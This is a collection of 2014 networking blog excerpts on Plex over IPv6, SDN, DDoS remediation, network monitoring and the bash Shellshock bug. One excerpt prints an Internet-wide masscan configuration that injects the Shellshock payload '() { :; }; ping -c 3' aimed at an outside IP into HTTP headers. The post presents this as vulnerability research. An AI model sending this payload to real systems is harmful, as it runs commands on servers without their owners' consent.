IPv6 in my streaming media? More likely than you think!

Not that I go out of my way to endorse one project/product over another, there is one that I have recently fallen in love with for streaming my media. Especially when it can use IPv6! So I needed a cross-platform solution for my streaming media needs. I was originally using XBMC, but only had it tied into the TV. I use several other computers and devices, in other locations outside of the house. So I read up on Plex. Got it installed with little to no effort, and could readily access my content where ever I was. I even tested this on my last trip to London, UK and was able to get a decent 1.2mbit/s stream from my house. Only issue was that it wasn’t using IPv6 in the app or accessing via plex.tv (server on that site only comes up with an IPv4 address).

So poking around I discovered 2 things: 1) I could access the Plex server directly at the IP/hostname of the server, and 2) there was a checkbox to enable IPv6!!

plex-ipv6

Simply browse to your Plex server, click on the settings icon (screwdriver + wrench), select Server, click on Networking and then “Show Continue reading

Many eyes theory conclusively disproven

Just because a bug was found in open-source does not disprove the "many eyes" theory. Instead, it's bugs being found now that should've been found sometime in the last 25 years.

Many eyes are obviously looking at bash now, and they are finding fairly obvious problems. It's obvious that the parsing code in bash is deeply flawed, though any particular bug isn't so obvious. If many eyes had been looking at bash over the past 25 years, these bugs would've been found a long time ago.

Thus, we know that "many eyes" haven't been looking at bash.

The theory is the claim promoted by open-source advocates that "many eyes makes bugs shallow", the theory that open-source will have fewer bugs (and fewer security problems) since anyone can look at the code.

What we've seen is that, in fact, very few people ever read code, even when it's open-source. The average programmers writes 10x more code than they read. The only people where that equation is reversed are professional code auditors -- and they are hired primarily to audit closed-source code. Companies like Microsoft pay programmers to review code because reviewing code is not otherwise something programmers like to do.

From Continue reading

MidoNet for the Overlay, Cumulus Linux for the Underlay. Like Coffee and Cream.

VTEP is not the only way MidoNet customers can use a switch that runs Cumulus Linux as the underlay (physical network) for the virtual, overlay networks.

We’ve announced our partnership to work with Cumulus Networks earlier in 2014 to use Cumulus Linux as a Layer-2 VxLAN Gateway to bridge VLANs in the virtual network world to the VLANs in the physical world.

We’ve shipped that code as part of MidoNet version 1.6.

We now want to talk about how VTEP is not the only way MidoNet customers can use a switch that runs Cumulus Linux as the underlay (physical network) for the virtual, overlay networks.    Just don’t think of running a set of gateway switches as the only way to benefit from these devices, we see many opportunities and benefits.

Here are some examples why it makes sense :

Automation

Remember that Cumulus Linux IS Linux. It’s not a switch OS that just happens to be based on Linux.  It offers cloud automation capabilities that is so crucial to customers who are adopting to move towards building a Cloud. If you listen to Customers, Systems like Chef and Puppet are widely used in the deployment of systems like OpenStack, Continue reading

FCC advised on Remediation of Server-based DDoS Attacks

Yesterday, the Communications Security, Reliability and Interoperability Council (CSRIC), a federal advisory committee to the Federal Communications Commission (FCC), submitted its final report on Remediation of Server-based DDoS Attacks.

The CSRIC’s Working Group 5 was tasked with developing recommendations for communications providers to enable them to mitigate the impact of high volume DDoS attacks launched from large data center and hosting environments.

The final report includes a comprehensive look at the DDoS threat landscape, covering everything from the massive size of today’s attacks, to the potential for collateral damage. The report describes how DDoS attacks are becoming increasingly complex, how they are being used as a diversion “to distract security resources while other attacks are being attempted, e.g., fraudulent transactions.” The report also discusses how botnet architectures are becoming more sophisticated and difficult to trace.

Given this complex and challenging threat landscape, we were grateful for the opportunity to contribute. The CSRIC has adapted Arbor Networks best practices for DDoS incident response as the Six Phases for DDoS Attack Preparation & Response.

Web_SixPhases_Final

Roland Dobbins, senior analyst with Arbor’s Security Engineering & Response Team (ASERT), served as the Internet sub-group chairman of CSRIC IV WG5 – Server-Based Continue reading

PQ Show 33 – Intel Rack Scale Architecture – Real or Impractical ?

At the IDF 2014 conference, Intel made a big song and dance about their Rack Scale Architecture which removes the need for “top of rack” networking and changes the nature of servers in a big way. My initial impression is that this has limited application in the enterprise or cloud providers but might be useful […]

Author information

Greg Ferro

Greg Ferro is a Network Engineer/Architect, mostly focussed on Data Centre, Security Infrastructure, and recently Virtualization. He has over 20 years in IT, in wide range of employers working as a freelance consultant including Finance, Service Providers and Online Companies. He is CCIE#6920 and has a few ideas about the world, but not enough to really count.

He is a host on the Packet Pushers Podcast, blogger at EtherealMind.com and on Twitter @etherealmind and Google Plus.

The post PQ Show 33 – Intel Rack Scale Architecture – Real or Impractical ? appeared first on Packet Pushers Podcast and was written by Greg Ferro.

Three Big SDN Questions for Your SDN Development Plan

SDN is happening. What questions should you be asking about your own development plan to learn SDN skills?

I’ve been thinking about this question in preparation for an upcoming Interop Debate on October 1st, where we’ll be discussing the options to pursue traditional certifications versus learning about SDN. Today’s post begins a series of posts related to topics surrounding that debate. To begin, we’ll look at three big-picture questions you should ask when you get serious about studying about SDN.

Overview

How much of your skill set happened to you, rather than being something you planned? How much of your learning relates to surviving today’s job tasks, versus learning for the future?

Let’s face it, many days, we do the job in front of us, with little time to devote to learning something unrelated. However, that’s a fundamental question for any IT knowledge-based worker. Do you have a development plan? Do you spend time working that plan? And now with SDN happening… how should you revise that plan in light of SDN? In the time you can devote this week/month/year, what should you be learning about SDN?

Some people will wait to learn SDN when the next project Continue reading

Network Taps, Monitoring & Visibility Fabrics: Modern Packet Sniffing

Before we go in to observed trends, let’s put some context on this post and definitions around monitoring. Network monitoring and tapping, this can be described as “packet capture, packet and session analysis and NetFlow generation with analytics”. Tap fabrics typically provide a means of extracting packets from a network but not so much the analysis. Tools like Wireshark, Lancope’s Stealth Watch and a good IDP solution are still required.

Current Situation and Legacy Methodology

In days of past (and most current networks), if you want/ed to harvest packets from a network the quickest route was to mirror a port to a server running Wireshark and filter the results to make sense of what was going on from a protocol and application point of view. Cisco have tools like the NAM, which comes in several forms such as a server, Catalyst 6500 switch module and ISR module. The NAM allows you to visually observe network trends and network conversations via generated graphs but also inspect by download the PCAP files. Probably one of the most pleasant experiences most people have in addition to Wireshark.

Some shortcomings exist with this approach in so much as the device that receives the mirrored Continue reading

Policy versus ACLs, it’s those exposed implementation details again

In a blog week dedicated to the application and the policies that govern them, I wanted to add some detail on a discussion I have with customers quite often. It should be clear that we at Plexxi believe in application policy driven network behaviors. Our Affinities allow you to specify desired behavior between network endpoints, which will evolve with the enormous amount of policy work Mat described in his 3 piece article earlier this week.

ACL

Many times when I discuss Affinities and policies with customers or more generically with network engineering types, the explanation almost always lands at Access Control Lists (ACLs). Cisco created the concept of ACLs (and its many variations used for other policy constructs) way way back as a mechanism to instruct the switching chips inside their routers to accept or drop traffic. It started with a very simple “traffic from this source to this destination is dropped” and has very significantly evolved since then in Cisco’s implementation and many other of the router and switch vendors.

There are 2 basic components in an ACL:

1. what should I match a packet on

2. what is the action I take once I found a match.

Both Continue reading

Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known that long that passing HTTP values to shell scripts is a bad idea.

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet-sniffer that gave it's name to the entire class of products.

One day, the head of IT comes to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, but I hadn't considered that bug before (to my great embarrassment), but of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self evident in the way that Continue reading

Quick Guide to my Interop New York Sessions

I’m running or participating in five workshops or sessions during next week’s Interop New York. Three of them build on each other, so you might want to attend all of them in sequence:

Designing Infrastructure for Private Clouds starts with requirements gathering phase and focuses on physical infrastructure design decisions covering compute, storage, physical and virtual networking, and network services. If you plan to build a private (or a reasonable small public) cloud, start here.

Read more ...

Bash ‘shellshock’ bug is wormable

Early results from my scan: there's about 3000 systems vulnerable just on port 80, just on the root "/" URL, without Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses that than.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site, and testing well-known CGI scripts (like the CPanel one) would give a lot more results, at least 10x.

Thirdly, it's embedded webserves on odd ports that are the real danger. Scanning for more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.

Consequently, even though my light scan found only 3000 results, this thing is clearly Continue reading

Docker Hub Official Repos: Announcing Language Stacks

shipping-containers

With Docker containers fast becoming the standard for building blocks for distributed apps, we’re working with the Docker community to make it easier for users to quickly code and assemble their projects.  Official Repos, publicly downloadable for free from the Docker Hub Registry, are curated images informed by user feedback and best practices.  They represent a focused community effort to provide great base images for applications, so developers and sysadmins can focus on building new features and functionality while minimizing repetitive work on commodity scaffolding and plumbing.

At DockerCon last June, we announced the first batch of Official Repos which covered many standard tools like OS distributions, web servers, and databases.  At the time, we had several organizations join us to curate Official Repos for their particular project, including Fedora, CentOS, and Canonical.  And the community responded enthusiastically as well: in the three months since they launched, Official Repos have so grown in popularity that they now account for almost 20% of all image downloads.

Parlez-vous…?

Based on the search queries on the Docker Hub Registry and discussions with many of you, we determined that the community wants pre-built stacks of their favorite programming languages.  Specifically, developers Continue reading

Bash ‘shellshock’ scan of the Internet

NOTE: malware is now using this as their User-agent. I haven't run a scan now for over two days.

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72.

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some earlier shows that this bug is widespread:
A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.


Bash vulnerability CVE-2014-6271 patched

This morning, Stephane Chazelas disclosed a vulnerability in the program bash, the GNU Bourne-Again-Shell. This software is widely used, especially on Linux servers, such as the servers used to provide CloudFlare’s performance and security cloud services.

This vulnerability is a serious risk to Internet infrastructure, as it allows remote code execution in many common configurations, and the severity is heightened due to bash being in the default configuration of most Linux servers. While bash is not directly used by remote users, it is used internally by popular software packages such as web, mail, and administration servers. In the case of a web server, a specially formatted web request, when passed by the web server to the bash application, can cause the bash software to run commands on the server for the attacker. More technical information was posted on the oss-sec mailing list.

The security community has assigned this bash vulnerability the ID CVE-2014-6271.

As soon as we became aware of this vulnerability, CloudFlare’s engineering and operations teams tested a patch to protect our servers, and deployed it across our infrastructure. As of now, all CloudFlare servers are protected against CVS-2014-6271.

Everyone who is using the bash software package should upgrade Continue reading

Bash bug as big as Heartbleed

Today's bash bug is as big a deal as Heartbleed. That's for many reasons.

The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we'll never be able to catalogue all the software out there that is vulnerable to the bash bug. This is similar to the OpenSSL bug: OpenSSL is included in a bajillion software packages, so we were never able to fully quantify exactly how much software is vulnerable.

The second reason is that while the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable. These systems are rarely things like webservers, but are more often things like Internet-enabled cameras.

Internet-of-things devices like video cameras are especially vulnerable because a lot of their software is built from web-enabled bash scripts. Thus, not only are they less likely to be patched, they are more likely to expose the vulnerability to the outside world.

Unlike Heartbleed, which Continue reading

Necessity of Analytics and Monitoring in the SDN Era

Necessity of Monitoring and Analytics in the SDN Era


by Hariharan Ananthakrishnan, Distinguished Engineer - September 24, 2014

A recent SDNCentral article about the Five Habits of Highly Effective SDN Startups asserts that achieving success in the SDN landscape will require creating focused products that solve real-world problems. In addition, the article emphasizes the need to build a sales channel with great partners, market strategically but be lean and mean, and adopt a slow and steady route into the SDN world. 

The article quoted the new landscape of SDN as we know it. Take a look at the diagram below. The building blocks range from controllers to network operating systems to monitoring and analytics. 



As the above diagram illustrates, monitoring and analytics are key. With SDN, the network self-adapts to the new demands of the application, and without visibility into these changes it’s very hard to say if an SDN application is doing the right things to your network. Understanding the programmable events that happen in real time requires mature analytics technology that can correlate service delivery to physical and virtual resource states. 

At Packet Design, we have been working on a solution for SDN analytics Continue reading